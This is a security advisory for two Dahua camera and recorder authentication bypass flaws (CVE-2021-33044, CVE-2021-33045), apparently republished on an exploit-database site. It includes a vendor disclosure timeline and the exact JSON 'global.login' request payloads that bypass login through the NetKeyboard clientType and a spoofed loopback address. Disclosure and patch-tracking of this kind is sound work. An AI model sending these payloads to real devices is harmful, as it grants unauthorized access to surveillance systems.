0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dahua Authentication Bypass Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
[STX]
Subject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (2021)
Limited Disclosure: September 6, 2021
Full Disclosure: October 6, 2021
PoC: https://github.com/mcw0/DahuaConsole
-=[Dahua]=-
Advisory: https://www.dahuasecurity.com/support/cybersecurity/details/957
Firmware: https://www.dahuasecurity.com/support/downloadCenter/firmware
-=[Timeline]=-
June 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)
June 17, 2021: Sent reminder to Dahua PSIRT
June 18, 2021: Asked IPVM for help to get in contact with Dahua
June 18, 2021: Received ACK from IPVM, told they sent note to Dahua
June 19, 2021: ACK received from Dahua PSIRT, asked for additional details
June 19, 2021: Additional details including PoC sent
June 21, 2021: ACK received, vulnerabilites confirmed
June 23, 2021: Dahua PSIRT asked for "coordinated disclosure"
June 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now
June 24, 2021: Received CVE-2021-33044, I asked about the second CVE
July 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for "coordinated disclosure"
July 04, 2021: Confirmed "coordinated disclosure", once again
July 05, 2021: Dahua PSIRT tried convince me for "Full Disclosure" for vendor only, and "Limited Disclosure" for outside world
July 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before "Limited Disclosure" September 6, 2021.
"Full Disclosure" will be October 6, 2021,
August 30, 2021: Dahua PSIRT asked to read my "Limited Disclosure" note
August 30, 2021: Sent my "Limited Disclosure" note
September 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates
September 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices
September 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware
September 2, 2021: Refused to provide details, as I do expect me to find firmware on their website
September 3, 2021: Dahua PSIRT informed that R&D will upload updated firmware in batches
September 6, 2021: Limited Disclosure
October 6, 2021: Full Disclosure
-=[NetKeyboard Vulnerability]=-
CVE-2021-33044
Vulnerability:
"clientType": "NetKeyboard",
Vulnerable device types: IPC/VTH/VTO (tested)
Vulnerable Firmware: Those devices who do not support "NetKeyboard" functionality (older than June 2021)
Protocol: DHIP and HTTP/HTTPS
Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence will simply bypass authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}
[Example]
{
"method": "global.login",
"params":
{
"userName": "admin",
"loginType": "Direct",
"clientType": "NetKeyboard",
"authorityType": "Default",
"passwordType": "Default",
"password": "Not Used"
},
"id": 1,
"session": 0
}
-=[Loopback Vulnerability]=-
CVE-2021-33045
Vulnerability:
"ipAddr": "127.0.0.1",
"loginType": "Loopback",
"clientType": "Local",
Vulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)
Vulnerable Firmware: Firmware version older than beginning/mid 2020.
Protocol: DHIP
Details:
Setting above "Vulnerability" on "Vulnerable device types" during 1st or 2nd "global.login" sequence pretends that the login request comes from "loopback" and will therefore bypass legitimate authentication.
Successful bypass returns: {"id":1,"params":{"keepAliveInterval":60},"result":true,"session":<sessionID>}
[Example]
Random MD5 with l/p: admin/admin
{
"method": "global.login",
"params":
{
"userName": "admin",
"ipAddr": "127.0.0.1",
"loginType": "Loopback",
"clientType": "Local",
"authorityType": "Default",
"passwordType": "Default",
"password": "[REDACTED]"
},
"id": 1,
"session": 0
}
Plain text with l/p: admin/admin
{
"method": "global.login",
"params":
{
"userName": "admin",
"ipAddr": "127.0.0.1",
"loginType": "Loopback",
"clientType": "Local",
"authorityType": "Default",
"passwordType": "Plain",
"password": "admin"
},
"id": 1,
"session": 0
}
[ETX]
# 0day.today [2024-11-16] #